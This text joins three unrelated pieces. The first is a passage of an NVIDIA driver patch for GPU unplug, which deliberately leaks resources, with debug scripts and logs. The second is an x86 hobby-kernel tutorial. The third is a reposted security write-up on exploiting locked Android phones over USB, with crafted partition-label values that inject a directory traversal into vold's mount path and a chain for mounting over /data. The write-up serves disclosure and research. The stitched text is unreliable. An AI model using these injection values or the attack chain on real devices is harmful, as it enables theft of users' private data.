+++ patched/nvidia/nv-modeset-interface.c	2018-10-28 07:20:25.959243110 +0000
@@ -114,6 +114,7 @@
         .close_gpu      = nvidia_dev_put,
         .op             = rm_kernel_rmapi_op, /* provided by nv-kernel.o */
         .set_callbacks  = nvidia_modeset_set_callbacks,
+        .gpu_dead       = nvidia_dev_dead,
     };
 
     if (strcmp(rm_ops->version_string, NV_VERSION_STRING) != 0)
diff -ur original/nvidia/nv-reg.h patched/nvidia/nv-reg.h
diff -ur original/nvidia-modeset/nvidia-modeset-linux.c patched/nvidia-modeset/nvidia-modeset-linux.c
--- original/nvidia-modeset/nvidia-modeset-linux.c	2018-09-23 12:20:02.000000000 +0000
+++ patched/nvidia-modeset/nvidia-modeset-linux.c	2018-10-28 07:47:14.738703417 +0000
@@ -75,6 +75,9 @@
 
 static struct semaphore nvkms_lock;
 
+static NvU32 clopen_gpu_id;
+static NvBool leak_on_unload;
+
 /*************************************************************************
  * NVKMS executes queued work items on a single kthread.
  *************************************************************************/
@@ -89,6 +92,9 @@
 struct nvkms_per_open {
     void *data;
 
+    NvU32 gpu_id;
+    atomic_t *gpu_dead;
+
     enum NvKmsClientType type;
 
     union {
@@ -711,6 +717,9 @@
     nvidia_modeset_stack_ptr stack = NULL;
     NvBool ret;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_open_gpu called with %08x, pid %d\n",
+           gpuId, current->pid);
+
     if (__rm_ops.alloc_stack(&stack) != 0) {
         return NV_FALSE;
     }
@@ -719,6 +728,10 @@
 
     __rm_ops.free_stack(stack);
 
+    if (ret) {
+        clopen_gpu_id = gpuId;
+    }
+
     return ret;
 }
 
@@ -726,12 +739,17 @@
 {
     nvidia_modeset_stack_ptr stack = NULL;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_close_gpu called with %08x, pid %d\n",
+           gpuId, current->pid);
+
     if (__rm_ops.alloc_stack(&stack) != 0) {
         return;
     }
 
     __rm_ops.close_gpu(gpuId, stack);
 
+    clopen_gpu_id = gpuId;
+
     __rm_ops.free_stack(stack);
 }
 
@@ -771,8 +789,14 @@
 
     popen->type = type;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_open_common, pid %d\n",
+           current->pid);
+
     *status = down_interruptible(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_open_common, pid %d\n",
+           current->pid);
+
     if (*status != 0) {
         goto failed;
     }
@@ -781,6 +805,9 @@
 
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_open_common, pid %d\n",
+           current->pid);
+
     if (popen->data == NULL) {
         *status = -EPERM;
         goto failed;
@@ -799,10 +826,16 @@
 
     *status = 0;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "exiting in nvkms_open_common, pid %d\n",
+           current->pid);
+
     return popen;
 
 failed:
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "error in nvkms_open_common, pid %d\n",
+           current->pid);
+
     nvkms_free(popen, sizeof(*popen));
 
     return NULL;
@@ -816,14 +849,36 @@
      * mutex.
      */
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_close_common, pid %d\n",
+           current->pid);
+
     down(&nvkms_lock);
 
-    nvKmsClose(popen->data);
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_close_common, pid %d\n",
+           current->pid);
+
+    if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) {
+        printk(KERN_ERR NVKMS_LOG_PREFIX "awwww u need cleanup :3 "
+               "in nvkms_close_common, pid %d\n",
+               current->pid);
+
+        nvkms_close_gpu(popen->gpu_id);
+
+        popen->gpu_id = 0;
+        popen->gpu_dead = NULL;
+
+        leak_on_unload = NV_TRUE;
+    } else {
+        nvKmsClose(popen->data);
+    }
 
     popen->data = NULL;
 
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_close_common, pid %d\n",
+           current->pid);
+
     if (popen->type == NVKMS_CLIENT_KERNEL_SPACE) {
         /*
          * Flush any outstanding nvkms_kapi_event_kthread_q_callback() work
@@ -844,6 +899,9 @@
     }
 
     nvkms_free(popen, sizeof(*popen));
+
+    printk(KERN_INFO NVKMS_LOG_PREFIX "exiting nvkms_close_common, pid %d\n",
+           current->pid);
 }
 
 int NVKMS_API_CALL nvkms_ioctl_common
@@ -855,20 +913,58 @@
     int status;
     NvBool ret;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
     status = down_interruptible(&nvkms_lock);
     if (status != 0) {
         return status;
     }
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
+    if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) {
+        goto dead;
+    }
+
+    clopen_gpu_id = 0;
+
     if (popen->data != NULL) {
         ret = nvKmsIoctl(popen->data, cmd, address, size);
     } else {
         ret = NV_FALSE;
     }
 
+    if (clopen_gpu_id != 0) {
+        if (!popen->gpu_id) {
+            printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x open in nvkms_ioctl_common, "
+                   "pid %d\n", clopen_gpu_id, current->pid);
+            popen->gpu_id = clopen_gpu_id;
+            popen->gpu_dead = __rm_ops.gpu_dead(clopen_gpu_id);
+        } else {
+            printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x close in nvkms_ioctl_common, "
+                   "pid %d\n", clopen_gpu_id, current->pid);
+            popen->gpu_id = 0;
+            popen->gpu_dead = NULL;
+        }
+    }
+
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
     return ret ? 0 : -EPERM;
+
+dead:
+    up(&nvkms_lock);
+
+    printk(KERN_ERR NVKMS_LOG_PREFIX "*notices ur gpu is dead* owo whats this "
+           "in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
+    return -ENOENT;
 }
 
 /*************************************************************************
@@ -1239,9 +1335,14 @@
 
     nvkms_proc_exit();
 
-    down(&nvkms_lock);
-    nvKmsModuleUnload();
-    up(&nvkms_lock);
+    if(leak_on_unload) {
+        printk(KERN_ERR NVKMS_LOG_PREFIX "im just gonna leak all the kms junk ok? "
+               "haha nvm wasnt a question. in nvkms_exit\n");
+    } else {
+        down(&nvkms_lock);
+        nvKmsModuleUnload();
+        up(&nvkms_lock);
+    }
 
     /*
      * At this point, any pending tasks should be marked canceled, but

Here’s some handy scripts I was using while debugging it:

insmod.sh
#!/bin/sh -ex
modprobe acpi_ipmi
insmod nvidia.ko NVreg_ResmanDebugLevel=-1 NVreg_CheckPCIConfigSpace=0
insmod nvidia-modeset.ko
dmesg -w
rmmod.sh
#!/bin/sh
rmmod nvidia-modeset
rmmod nvidia
xorg.sh
#!/bin/sh
exec Xorg :8 -config /etc/bumblebee/xorg.conf.nvidia -configdir /etc/bumblebee/xorg.conf.d -sharevts -nolisten tcp -noreset -verbose 3 -isolateDevice PCI:06:00:0 -modulepath /usr/lib/nvidia/nvidia,/usr/lib/xorg/modules

And finally, here are the relevant kernel and Xorg log messages, showing what happens when a GPU is unplugged:

dmesg.log
[  219.524218] NVRM: loading NVIDIA UNIX x86_64 Kernel Module  390.87  Tue Aug 21 12:33:05 PDT 2018 (using threaded interrupts)
[  219.527409] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  390.87  Tue Aug 21 16:16:14 PDT 2018
[  224.780721] nvidia-modeset: nvkms_open_gpu called with 00000600, pid 4560
[  224.807370] nvidia-modeset: detected gpu 00000600 open in nvkms_ioctl_common, pid 4560
[  239.061383] NVRM: GPU at PCI:0000:06:00: GPU-9fe1319c-8dd3-44e4-2b74-de93f8b02c6a
[  239.061387] NVRM: Xid (PCI:0000:06:00): 79, GPU has fallen off the bus.
[  239.061389] NVRM: GPU at 0000:06:00.0 has fallen off the bus.
[  239.061398] NVRM: A GPU crash dump has been created. If possible, please run
               NVRM: nvidia-bug-report.sh as root to collect this data before
               NVRM: the NVIDIA kernel module is unloaded.
[  240.209498] NVRM: Attempting to remove minor device 0 with non-zero usage count!
[  240.209501] NVRM: YOLO, waiting for usage count to drop to zero
[  241.433499] nvidia-modeset: *notices ur gpu is dead* owo whats this in nvkms_ioctl_common, pid 4560
[  241.433851] nvidia-modeset: awwww u need cleanup :3 in nvkms_close_common, pid 4560
[  241.433853] nvidia-modeset: nvkms_close_gpu called with 00000600, pid 4560
[  250.440498] NVRM: Usage count is now zero, proceeding to remove the GPU
[  250.440513] NVRM: This is not actually supposed to work lol. Hope it does tho 👍
[  250.440520] NVRM: You probably want to reload nvidia-modeset now if you want any of this to ever start up again, but like, man, that's your choice entirely
[  250.440870] pci 0000:06:00.1: Dropping the link to 0000:06:00.0
[  250.440950] pci_bus 0000:06: busn_res: [bus 06] is released
[  250.440982] pci_bus 0000:07: busn_res: [bus 07-38] is released
[  250.441012] pci_bus 0000:05: busn_res: [bus 05-38] is released
[  251.000794] pci_bus 0000:02: Allocating resources
[  251.001324] pci_bus 0000:02: Allocating resources
[  253.765953] pcieport 0000:00:1c.0: AER: Corrected error received: 0000:00:1c.0
[  253.765969] pcieport 0000:00:1c.0: PCIe Bus Error: severity=Corrected, type=Physical Layer, (Receiver ID)
[  253.765976] pcieport 0000:00:1c.0:   device [8086:9d10] error status/mask=00002001/00002000
[  253.765982] pcieport 0000:00:1c.0:    [ 0] Receiver Error         (First)
[  253.841064] pcieport 0000:02:02.0: Refused to change power state, currently in D3
[  253.843882] pcieport 0000:02:00.0: Refused to change power state, currently in D3
[  253.846177] pci_bus 0000:03: busn_res: [bus 03] is released
[  253.846248] pci_bus 0000:04: busn_res: [bus 04-38] is released
[  253.846300] pci_bus 0000:39: busn_res: [bus 39] is released
[  253.846348] pci_bus 0000:02: busn_res: [bus 02-39] is released
[  353.369487] nvidia-modeset: im just gonna leak all the kms junk ok? haha nvm wasnt a question. in nvkms_exit
[  357.600350] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  390.87  Tue Aug 21 16:16:14 PDT 2018
Xorg.8.log
[   244.798] (EE) NVIDIA(GPU-0): WAIT (2, 8, 0x8000, 0x000011f4, 0x00001210)

Let’s write a Kernel

( Original text )

Let us write a simple kernel which could be loaded with the GRUB bootloader on an x86 system. This kernel will display a message on the screen and then hang.

How does an x86 machine boot

Before we think about writing a kernel, let’s see how the machine boots up and transfers control to the kernel:

Most registers of the x86 CPU have well-defined values after power-on. The Instruction Pointer (EIP) register holds the memory address of the instruction being executed by the processor. EIP is hardcoded to the value 0xFFFFFFF0. Thus, the x86 CPU is hardwired to begin execution at the physical address 0xFFFFFFF0. It is, in fact, the last 16 bytes of the 32-bit address space. This memory address is called the reset vector.

Now, the chipset’s memory map makes sure that 0xFFFFFFF0 is mapped to a certain part of the BIOS, not to the RAM. Meanwhile, the BIOS copies itself to the RAM for faster access. This is called shadowing. The address 0xFFFFFFF0 will contain just a jump instruction to the address in memory where BIOS has copied itself.

Thus, the BIOS code starts its execution. The BIOS first searches for a bootable device in the configured boot device order. It checks for a certain magic number to determine whether the device is bootable or not (whether bytes 511 and 512 of the first sector are 0x55 and 0xAA, i.e. the word 0xAA55).

Once the BIOS has found a bootable device, it copies the contents of the device’s first sector into RAM starting from physical address 0x7c00; and then jumps into the address and executes the code just loaded. This code is called the bootloader.

The bootloader then loads the kernel at the physical address 0x100000. The address 0x100000 is used as the start-address for all big kernels on x86 machines.

All x86 processors begin in a simplistic 16-bit mode called real mode. The GRUB bootloader makes the switch to 32-bit protected mode by setting the lowest bit of CR0 register to 1. Thus the kernel loads in 32-bit protected mode.

Do note that in case of linux kernel, GRUB detects linux boot protocol and loads linux kernel in real mode. Linux kernel itself makes the switch to protected mode.

 

What all do we need?

* An x86 computer (of course)
* Linux
* NASM assembler
* gcc
* ld (GNU Linker)
* grub

 

Source Code

Source code is available at my Github repository — mkernel

 

The entry point using assembly

We like to write everything in C, but we cannot avoid a little bit of assembly. We will write a small file in x86 assembly-language that serves as the starting point for our kernel. All our assembly file will do is invoke an external function which we will write in C, and then halt the program flow.

How do we make sure that this assembly code will serve as the starting point of the kernel?

We will use a linker script that links the object files to produce the final kernel executable (more on this later). In this linker script, we will explicitly specify that we want our binary to be loaded at the address 0x100000. This address, as I have said earlier, is where the kernel is expected to be. Thus, the bootloader will take care of firing the kernel’s entry point.

Here’s the assembly code:

;;kernel.asm
bits 32			;nasm directive - 32 bit
section .text

global start
extern kmain	        ;kmain is defined in the c file

start:
  cli 			;block interrupts
  mov esp, stack_space	;set stack pointer
  call kmain
  hlt		 	;halt the CPU

section .bss
resb 8192		;8KB for stack
stack_space:

The first instruction, bits 32, is not an x86 assembly instruction. It’s a directive to the NASM assembler that specifies it should generate code to run on a processor operating in 32-bit mode. It is not strictly required in our example; however, it is included here as it’s good practice to be explicit.

The second line begins the text section (aka code section). This is where we put all our code.

global is another NASM directive to set symbols from source code as global. By doing so, the linker knows where the symbol start is; which happens to be our entry point.

kmain is our function that will be defined in our kernel.c file. extern declares that the function is defined elsewhere.

Then, we have the start function, which calls the kmain function and halts the CPU using the hlt instruction. Interrupts can wake the CPU from an hlt instruction, so we disable interrupts beforehand using the cli instruction. cli is short for clear-interrupts.

We should ideally set aside some memory for the stack and point the stack pointer (esp) to it. However, it seems like GRUB does this for us and the stack pointer is already set at this point. But, just to be sure, we will allocate some space in the BSS section and point the stack pointer to the beginning of the allocated memory. We use the resb instruction which reserves memory given in bytes. After it, a label is left which will point to the edge of the reserved piece of memory. Just before the kmain is called, the stack pointer (esp) is made to point to this space using the mov instruction.

 

The kernel in C

In kernel.asm, we made a call to the function kmain(). So our C code will start executing at kmain():

/*
*  kernel.c
*/
void kmain(void)
{
	const char *str = "my first kernel";
	char *vidptr = (char*)0xb8000; 	//video mem begins here.
	unsigned int i = 0;
	unsigned int j = 0;

	/* this loop clears the screen
	* there are 25 lines each of 80 columns; each element takes 2 bytes */
	while(j < 80 * 25 * 2) {
		/* blank character */
		vidptr[j] = ' ';
		/* attribute-byte - light grey on black screen */
		vidptr[j+1] = 0x07; 		
		j = j + 2;
	}

	j = 0;

	/* this loop writes the string to video memory */
	while(str[j] != '\0') {
		/* the character's ascii */
		vidptr[i] = str[j];
		/* attribute-byte: give character black bg and light grey fg */
		vidptr[i+1] = 0x07;
		++j;
		i = i + 2;
	}
	return;
}

All our kernel will do is clear the screen and write to it the string “my first kernel”.

First we make a pointer vidptr that points to the address 0xb8000. This address is the start of video memory in protected mode. The screen’s text memory is simply a chunk of memory in our address space. The memory-mapped input/output for the screen starts at 0xb8000 and supports 25 lines, each line containing 80 ASCII characters.

Each character element in this text memory is represented by 16 bits (2 bytes), rather than the 8 bits (1 byte) we are used to. The first byte holds the representation of the character as in ASCII. The second byte is the attribute-byte, which describes the formatting of the character, including attributes such as color.

To print the character s in green color on a black background, we will store the character s in the first byte of the video memory address and the value 0x02 in the second byte. Here, 0 represents a black background and 2 represents a green foreground.
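
For example, printing that green s at the top-left corner of the screen would look like this inside kmain:

char *vidptr = (char*)0xb8000;  /* start of video memory */
vidptr[0] = 's';                /* the character's ASCII code */
vidptr[1] = 0x02;               /* attribute-byte: green on black */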

Have a look at table below for different colors:

0 - Black, 1 - Blue, 2 - Green, 3 - Cyan, 4 - Red, 5 - Magenta, 6 - Brown, 7 - Light Grey, 8 - Dark Grey, 9 - Light Blue, 10/a - Light Green, 11/b - Light Cyan, 12/c - Light Red, 13/d - Light Magenta, 14/e - Light Brown, 15/f – White.

 

In our kernel, we will use light grey character on a black background. So our attribute-byte must have the value 0x07.

In the first while loop, the program writes the blank character with 0x07 attribute all over the 80 columns of the 25 lines. This thus clears the screen.

In the second while loop, characters of the null terminated string “my first kernel” are written to the chunk of video memory with each character holding an attribute-byte of 0x07.

This should display the string on the screen.

 

The linking part

We will assemble kernel.asm with NASM to an object file; and then using GCC we will compile kernel.c to another object file. Now, our job is to get these objects linked to an executable bootable kernel.

For that, we use an explicit linker script, which can be passed as an argument to ld (our linker).

/*
*  link.ld
*/
OUTPUT_FORMAT(elf32-i386)
ENTRY(start)
SECTIONS
 {
   . = 0x100000;
   .text : { *(.text) }
   .data : { *(.data) }
   .bss  : { *(.bss)  }
 }

First, we set the output format of our output executable to be 32 bit Executable and Linkable Format (ELF). ELF is the standard binary file format for Unix-like systems on x86 architecture.

ENTRY takes one argument. It specifies the symbol name that should be the entry point of our executable.

SECTIONS is the most important part for us. Here, we define the layout of our executable. We could specify how the different sections are to be merged and at what location each of these is to be placed.

Within the braces that follow the SECTIONS statement, the period character (.) represents the location counter.
The location counter is always initialized to 0x0 at beginning of the SECTIONS block. It can be modified by assigning a new value to it.

Remember, earlier I told you that kernel’s code should start at the address 0x100000. So, we set the location counter to 0x100000.

Have a look at the next line: .text : { *(.text) }

The asterisk (*) is a wildcard character that matches any file name. The expression *(.text) thus means all .text input sections from all input files.

So, the linker merges all text sections of the object files to the executable’s text section, at the address stored in the location counter. Thus, the code section of our executable begins at 0x100000.

After the linker places the text output section, the value of the location counter will become
0x100000 + the size of the text output section.

Similarly, the data and bss sections are merged and placed at the successive values of the location counter.

 

Grub and Multiboot

Now, we have all our files ready to build the kernel. But, since we like to boot our kernel with the GRUB bootloader, there is one step left.

There is a standard for loading various x86 kernels using a bootloader, called the Multiboot specification.

GRUB will only load our kernel if it complies with the Multiboot spec.

According to the spec, the kernel must contain a header (known as the Multiboot header) within its first 8 kilobytes.

Further, this Multiboot header must contain three 4-byte-aligned fields, namely:

  • magic field: containing the magic number 0x1BADB002, to identify the header.
  • flags field: We will not care about this field. We will simply set it to zero.
  • checksum field: the checksum field when added to the fields ‘magic’ and ‘flags’ must give zero.

So our kernel.asm will become:

;;kernel.asm

;nasm directive - 32 bit
bits 32
section .text
        ;multiboot spec
        align 4
        dd 0x1BADB002            ;magic
        dd 0x00                  ;flags
        dd - (0x1BADB002 + 0x00) ;checksum. m+f+c should be zero

global start
extern kmain	        ;kmain is defined in the c file

start:
  cli 			;block interrupts
  mov esp, stack_space	;set stack pointer
  call kmain
  hlt		 	;halt the CPU

section .bss
resb 8192		;8KB for stack
stack_space:

The dd defines a double word of size 4 bytes.

Building the kernel

We will now create object files from kernel.asm and kernel.c and then link it using our linker script.

nasm -f elf32 kernel.asm -o kasm.o

will run the assembler to create the object file kasm.o in ELF-32 bit format.

gcc -m32 -c kernel.c -o kc.o

The -c option makes sure that after compiling, linking doesn’t implicitly happen.

ld -m elf_i386 -T link.ld -o kernel kasm.o kc.o

will run the linker with our linker script and generate the executable named kernel.

 

Configure your grub and run your kernel

GRUB requires your kernel to be of the name pattern kernel-<version>. So, rename the kernel. I renamed my kernel executable to kernel-701.

Now place it in the /boot directory. You will require superuser privileges to do so.

In your GRUB configuration file grub.cfg you should add an entry, something like:

title myKernel
	root (hd0,0)
	kernel /boot/kernel-701 ro

 

Don’t forget to remove the directive hiddenmenu if it exists.

Reboot your computer, and you’ll get a list selection with the name of your kernel listed.

Select it and you should see:

[image: the booted kernel printing the string “my first kernel”]

That’s your kernel!!

 

PS:

  • It’s always advisable to get yourself a virtual machine for all kinds of kernel hacking.
  • To run this on GRUB 2, which is the default bootloader for newer distros, your config should look like this:

menuentry 'kernel 701' {
	set root='hd0,msdos1'
	multiboot /boot/kernel-701 ro
}

 

* Also, if you want to run the kernel on the qemu emulator instead of booting with GRUB, you can do so by:

qemu-system-i386 -kernel kernel

OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB

(original by Jann Horn, Google Project Zero)

Recently, there has been some attention around the topic of physical attacks on smartphones, where an attacker with the ability to connect USB devices to a locked phone attempts to gain access to the data stored on the device. This blogpost describes how such an attack could have been performed against Android devices (tested with a Pixel 2).

 

After an Android phone has been unlocked once on boot (on newer devices, using the "Unlock for all features and data" screen; on older devices, using the "To start Android, enter your password" screen), it retains the encryption keys used to decrypt files in kernel memory even when the screen is locked, and the encrypted filesystem areas or partition(s) stay accessible. Therefore, an attacker who gains the ability to execute code on a locked device in a sufficiently privileged context can not only backdoor the device, but can also directly access user data.
(Caveat: We have not looked into what happens to work profile data when a user who has a work profile toggles off the work profile.)

 

The bug reports referenced in this blogpost, and the corresponding proof-of-concept code, are available at:
https://bugs.chromium.org/p/project-zero/issues/detail?id=1583 ("directory traversal over USB via injection in blkid output")
https://bugs.chromium.org/p/project-zero/issues/detail?id=1590 ("privesc zygote->init; chain from USB")

 

These issues were fixed as CVE-2018-9445 (fixed at patch level 2018-08-01) and CVE-2018-9488 (fixed at patch level 2018-09-01).

The attack surface

Many Android phones support USB host mode (often using OTG adapters). This allows phones to connect to many types of USB devices (this list isn’t necessarily complete):

 

  • USB sticks: When a USB stick is inserted into an Android phone, the user can copy files between the system and the USB stick. Even if the device is locked, Android versions before P will still attempt to mount the USB stick. (Android 9, which was released after these issues were reported, has logic in vold that blocks mounting USB sticks while the device is locked.)
  • USB keyboards and mice: Android supports using external input devices instead of using the touchscreen. This also works on the lockscreen (e.g. for entering the PIN).
  • USB ethernet adapters: When a USB ethernet adapter is connected to an Android phone, the phone will attempt to connect to a wired network, using DHCP to obtain an IP address. This also works if the phone is locked.

 

This blogpost focuses on USB sticks. Mounting an untrusted USB stick offers nontrivial attack surface in highly privileged system components: The kernel has to talk to the USB mass storage device using a protocol that includes a subset of SCSI, parse its partition table, and interpret partition contents using the kernel’s filesystem implementation; userspace code has to identify the filesystem type and instruct the kernel to mount the device to some location. On Android, the userspace implementation for this is mostly in vold (one of the processes that are considered to have kernel-equivalent privileges), which uses separate processes in restrictive SELinux domains to e.g. determine the filesystem types of partitions on USB sticks.

 

The bug (part 1): Determining partition attributes

When a USB stick has been inserted and vold has determined the list of partitions on the device, it attempts to identify three attributes of each partition: Label (a user-readable string describing the partition), UUID (a unique identifier that can be used to determine whether the USB stick is one that has been inserted into the device before), and filesystem type. In the modern GPT partitioning scheme, these attributes can mostly be stored in the partition table itself; however, USB sticks tend to use the MBR partition scheme instead, which can not store UUIDs and labels. For normal USB sticks, Android supports both the MBR partition scheme and the GPT partition scheme.

 

To provide the ability to label partitions and assign UUIDs to them even when the MBR partition scheme is used, filesystems implement a hack: The filesystem header contains fields for these attributes, allowing an implementation that has already determined the filesystem type and knows the filesystem header layout of the specific filesystem to extract this information in a filesystem-specific manner. When vold wants to determine label, UUID and filesystem type, it invokes /system/bin/blkid in the blkid_untrusted SELinux domain, which does exactly this: First, it attempts to identify the filesystem type using magic numbers and (failing that) some heuristics, and then, it extracts the label and UUID. It prints the results to stdout in the following format:

 

/dev/block/sda1: LABEL="<label>" UUID="<uuid>" TYPE="<type>"

 

However, the version of blkid used by Android did not escape the label string, and the code responsible for parsing blkid’s output only scanned for the first occurrences of UUID=" and TYPE=". Therefore, by creating a partition with a crafted label, it was possible to gain control over the UUID and type strings returned to vold, which would otherwise always be a valid UUID string and one of a fixed set of type strings.
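To make the injection concrete, here is a hypothetical sketch (not the actual vold/blkid code) of how scanning for the first UUID=" occurrence goes wrong when the label itself contains that marker:

#include <iostream>
#include <string>

int main() {
    // blkid output for a partition whose *label* is: UUID="../##
    std::string line =
        "/dev/block/sda1: LABEL=\"UUID=\"../##\" UUID=\"1234-ABCD\" TYPE=\"vfat\"";
    // A naive parser that takes the first UUID=" it sees...
    size_t pos = line.find("UUID=\"");
    std::string uuid = line.substr(pos + 6, line.find('"', pos + 6) - (pos + 6));
    std::cout << uuid << "\n"; // prints "../##" -- attacker-controlled
}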

The bug (part 2): Mounting the filesystem

When vold has determined that a newly inserted USB stick with an MBR partition table contains a partition of type vfat that the kernel’s vfat filesystem implementation should be able to mount, PublicVolume::doMount() constructs a mount path based on the filesystem UUID, then attempts to ensure that the mountpoint directory exists and has appropriate ownership and mode, and then attempts to mount over that directory:

 

   if (mFsType != "vfat") {
       LOG(ERROR) << getId() << " unsupported filesystem " << mFsType;
       return -EIO;
   }
   if (vfat::Check(mDevPath)) {
       LOG(ERROR) << getId() << " failed filesystem check";
       return -EIO;
   }
   // Use UUID as stable name, if available
   std::string stableName = getId();
   if (!mFsUuid.empty()) {
       stableName = mFsUuid;
   }
   mRawPath = StringPrintf("/mnt/media_rw/%s", stableName.c_str());
   […]
   if (fs_prepare_dir(mRawPath.c_str(), 0700, AID_ROOT, AID_ROOT)) {
       PLOG(ERROR) << getId() << " failed to create mount points";
       return -errno;
   }
   if (vfat::Mount(mDevPath, mRawPath, false, false, false,
           AID_MEDIA_RW, AID_MEDIA_RW, 0007, true)) {
       PLOG(ERROR) << getId() << " failed to mount " << mDevPath;
       return -EIO;
   }

 

The mount path is determined using a format string, without any sanity checks on the UUID string that was provided by blkid. Therefore, an attacker with control over the UUID string can perform a directory traversal attack and cause the FAT filesystem to be mounted outside of /mnt/media_rw.

 

This means that if an attacker inserts a USB stick with a FAT filesystem whose label string is 'UUID="../##' into a locked phone, the phone will mount that USB stick to /mnt/##.

 

However, this straightforward implementation of the attack has several severe limitations; some of them can be overcome, others worked around:

 

  • Label string length: A FAT filesystem label is limited to 11 bytes. An attacker attempting to perform a straightforward attack needs to use the six bytes 'UUID="' to start the injection, which leaves only five characters for the directory traversal — insufficient to reach any interesting point in the mount hierarchy. The next section describes how to work around that.
  • SELinux restrictions on mountpoints: Even though vold is considered to be kernel-equivalent, a SELinux policy applies some restrictions on what vold can do. Specifically, the mounton permission is restricted to a set of permitted labels.
  • Writability requirement: fs_prepare_dir() fails if the target directory is not mode 0700 and chmod() fails.
  • Restrictions on access to vfat filesystems: When a vfat filesystem is mounted, all of its files are labeled as u:object_r:vfat:s0. Even if the filesystem is mounted in a place from which important code or data is loaded, many SELinux contexts won’t be permitted to actually interact with the filesystem — for example, the zygote and system_server aren’t allowed to do so. On top of that, processes that don’t have sufficient privileges to bypass DAC checks also need to be in the media_rw group. The section "Dealing with SELinux: Triggering the bug twice" describes how these restrictions can be avoided in the context of this specific bug.

Exploitation: Chameleonic USB mass storage

As described in the previous section, a FAT filesystem label is limited to 11 bytes. blkid supports a range of other filesystem types that have significantly longer label strings, but if you used such a filesystem type, you’d then have to make it past the fsck check for vfat filesystems and the filesystem header checks performed by the kernel when mounting a vfat filesystem. The vfat kernel filesystem doesn’t require a fixed magic value right at the start of the partition, so this might theoretically work somehow; however, because several of the values in a FAT filesystem header are actually important for the kernel, and at the same time, blkid also performs some sanity checks on superblocks, the PoC takes a different route.

 

After blkid has read parts of the filesystem and used them to determine the filesystem’s type, label and UUID, fsck_msdos and the in-kernel filesystem implementation will re-read the same data, and those repeated reads actually go through to the storage device. The Linux kernel caches block device pages when userspace directly interacts with block devices, but __blkdev_put() removes all cached data associated with a block device when the last open file referencing the device is closed.

 

A physical attacker can abuse this by attaching a fake storage device that returns different data for multiple reads from the same location. This allows us to present, for example, a romfs header with a long label string to blkid while presenting a perfectly normal vfat filesystem to fsck_msdos and the in-kernel filesystem implementation.

 

This is relatively simple to implement in practice thanks to Linux’ built-in support for device-side USB. Andrzej Pietrasiewicz’s talk "Make your own USB gadget" is a useful introduction to this topic. Basically, the kernel ships with implementations for device-side USB mass storage, HID devices, ethernet adapters, and more; using a relatively simple pseudo-filesystem-based configuration interface, you can configure a composite gadget that provides one or multiple of these functions, potentially with multiple instances, to the connected device. The hardware you need is a system that runs Linux and supports device-side USB; for testing this attack, a Raspberry Pi Zero W was used.

 

The f_mass_storage gadget function is designed to use a normal file as backing storage; to be able to interactively respond to requests from the Android phone, a FUSE filesystem is used as backing storage instead, using the direct_io option / the FOPEN_DIRECT_IO flag to ensure that our own kernel doesn’t add unwanted caching.

 

At this point, it is already possible to implement an attack that can steal, for example, photos stored on external storage. Luckily for an attacker, immediately after a USB stick has been mounted, com.android.externalstorage/.MountReceiver is launched, which is a process whose SELinux domain permits access to USB devices. So after a malicious FAT partition has been mounted over /data (using the label string 'UUID="../../data'), the zygote forks off a child with appropriate SELinux context and group membership to permit accesses to USB devices. This child then loads bytecode from /data/dalvik-cache/, permitting us to take control over com.android.externalstorage, which has the necessary privileges to exfiltrate external storage contents.

 

However, for an attacker who wants to access not just photos, but things like chat logs or authentication credentials stored on the device, this level of access should normally not be sufficient on its own.

Dealing with SELinux: Triggering the bug twice

The major limiting factor at this point is that, even though it is possible to mount over /data, a lot of the highly-privileged code running on the device is not permitted to access the mounted filesystem. However, one highly-privileged service does have access to it: vold.

 

vold actually supports two types of USB sticks, PublicVolume and PrivateVolume. Up to this point, this blogpost focused on PublicVolume; from here on, PrivateVolume becomes important.
A PrivateVolume is a USB stick that must be formatted using a GUID Partition Table. It must contain a partition that has type UUID kGptAndroidExpand (193D1EA4-B3CA-11E4-B075-10604B889DCF), which contains a dm-crypt-encrypted ext4 (or f2fs) filesystem. The corresponding key is stored at /data/misc/vold/expand_{partGuid}.key, where {partGuid} is the partition GUID from the GPT table as a normalized lowercase hexstring.

 

As an attacker, it normally shouldn’t be possible to mount an ext4 filesystem this way because phones aren’t usually set up with any such keys; and even if there is such a key, you’d still have to know what the correct partition GUID is and what the key is. However, we can mount a vfat filesystem over /data/misc and put our own key there, for our own GUID. Then, while the first malicious USB mass storage device is still connected, we can connect a second one that is mounted as PrivateVolume using the keys vold will read from the first USB mass storage device. (Technically, the ordering in the last sentence isn’t entirely correct — actually, the exploit provides both mass storage devices as a single composite device at the same time, but stalls the first read from the second mass storage device to create the desired ordering.)

 

Because PrivateVolume instances use ext4, we can control DAC ownership and permissions on the filesystem; and thanks to the way a PrivateVolume is integrated into the system, we can even control SELinux labels on that filesystem.

 

